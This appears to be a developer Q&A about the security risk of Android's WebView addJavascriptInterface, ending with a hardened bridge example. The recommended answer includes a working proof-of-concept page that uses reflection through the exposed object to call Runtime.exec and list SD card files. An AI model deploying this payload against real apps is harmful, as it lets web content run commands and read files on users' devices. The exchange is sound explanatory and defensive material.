Android JavascriptInterface Security?

Question

From the documentation: http://developer.android.com/reference/android/webkit/WebView.html#addJavascriptInterface%28java.lang.Object,%20java.lang.String%29

"Using addJavascriptInterface() allows JavaScript to control your application. This can be a very useful feature or a dangerous security issue. When the HTML in the WebView is untrustworthy (for example, part or all of the HTML is provided by some person or process), then an attacker could inject HTML that will execute your code and possibly any code of the attacker's choosing. Do not use addJavascriptInterface() unless all of the HTML in this WebView was written by you. The Java object that is bound runs in another thread and not in the thread that it was constructed in."

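Suppose I have an interface that only shows a custom dialog, or starts a download to the SD card. Would this be unsafe to use for any URL? How could an attacking page use the interface to run any code of the attacker's choosing?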

Update: According to the documentation:

This method can be used to allow JavaScript to control the host application. This is a powerful feature, but also presents a security risk for applications targeted to API level JELLY_BEAN or below, because JavaScript could use reflection to access an injected object's public fields. Use of this method in a WebView containing untrusted content could allow an attacker to manipulate the host application in unintended ways, executing Java code with the permissions of the host application. Use extreme care when using this method in a WebView which could contain untrusted content.

Is there an example of how this could happen? Is this just saying that DOWNLOADINTERFACE.dangerousfunction could be called if that's a public method on that class?

Update:

I tested based on the example of the exploit below, sites can get access to the system through interfaces in Android 4.4, 4.1, and 3.2.

However, I was not seeing this bug on Android 2.2, or 2.3, the hack only causes a force-close. What is the best way to prevent this hack, other than not using JSInterface? Can I include bogus functions like this, to prevent unauthorized calling of functions?

public Object getClass() {
  //throw error, return self, or something?  
}

Or rewrite everything using ajax and intercepting calls? Would that result in better/worse performance?

Update:

I succeeded in removing the JS interface, and replaced the functionality by defining window.open(specialurl) commands for all the window.(interface) functions, and overriding those in the shouldOverrideUrlLoading. Strangely enough, window.open() must be used in some cases, or the webview breaks display (like javascript is stopping?), and in other cases location.replace should be used or it will just show a "interface://specialdata" could not be found message.

(I set settings.setJavaScriptCanOpenWindowsAutomatically(true) so window.open works from JS all the time.)

Anyone know the best way to rewrite an app with this behavior?

Recommended answer

An example of accessing sdcard files from JavaScript:

<html>
  <head>
    <script>

      function getContents(inputStream)
      {
        var contents = "";
        var b = inputStream.read();
        var i = 1;
        while(b != -1) {
          var bString = String.fromCharCode(b);
          contents += bString;
          b = inputStream.read();
        }
        return contents;
      }

      function execute(cmdArgs)
      {
        //  go_back_js_interface_name is the registered java interface.
        //  it is an object, but is not iterable with for (var i in interface) {...}.
        return go_back_js_interface_name.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);
      }

      var p = execute(["ls","/mnt/sdcard/"]);
      document.write(getContents(p.getInputStream()));

    </script>
  </head>
  <body>
    Test
  </body>
</html>
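
A hardened form of the bridge discussed in this thread, as an added example that is not from the original question or answer. For apps targeting API 17 or later, only public methods annotated with @JavascriptInterface are callable from page script, so inherited methods such as getClass() are no longer reachable; on older platforms the sketch binds no object at all and uses the interface:// URL route the question describes. The names DownloadBridge, Downloader, "downloader", the interface://download?url=... shape and the host downloads.example.com are assumptions.

```java
import android.net.Uri;
import android.os.Build;
import android.webkit.JavascriptInterface;
import android.webkit.WebView;
import android.webkit.WebViewClient;

/** Hypothetical bridge exposing one narrow action; assumes targetSdkVersion >= 17. */
public final class DownloadBridge {
    /** App-supplied download action (hypothetical); must be thread-safe. */
    public interface Downloader { void enqueue(Uri source); }

    private static final String ALLOWED_HOST = "downloads.example.com"; // placeholder

    private final Downloader downloader;

    private DownloadBridge(Downloader downloader) { this.downloader = downloader; }

    /** Returns the parsed URL only if it is HTTPS on the allow-listed host, else null. */
    static Uri validate(String raw) {
        if (raw == null) return null;
        Uri uri = Uri.parse(raw);
        boolean ok = "https".equals(uri.getScheme()) && ALLOWED_HOST.equals(uri.getHost());
        return ok ? uri : null;
    }

    // The only method page script can call; it runs off the UI thread.
    @JavascriptInterface
    public void startDownload(String url) {
        Uri uri = validate(url); // every argument is attacker-controlled
        if (uri != null) downloader.enqueue(uri);
    }

    public static void attach(WebView webView, final Downloader downloader) {
        // Older platforms expose every public method, inherited ones included: bind nothing there.
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.JELLY_BEAN_MR1) {
            webView.addJavascriptInterface(new DownloadBridge(downloader), "downloader");
        }
        // URL route for all versions: interface://download?url=... (shape is an assumption).
        webView.setWebViewClient(new WebViewClient() {
            @Override
            public boolean shouldOverrideUrlLoading(WebView view, String url) {
                Uri request = Uri.parse(url);
                if (!"interface".equals(request.getScheme())) return false; // normal navigation
                if ("download".equals(request.getHost())) {
                    Uri uri = validate(request.getQueryParameter("url"));
                    if (uri != null) downloader.enqueue(uri);
                }
                return true; // never let the WebView try to load interface:// itself
            }
        });
    }
}
```

Both entry points funnel into the same validate() call, because any content loaded in the WebView can invoke either one.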
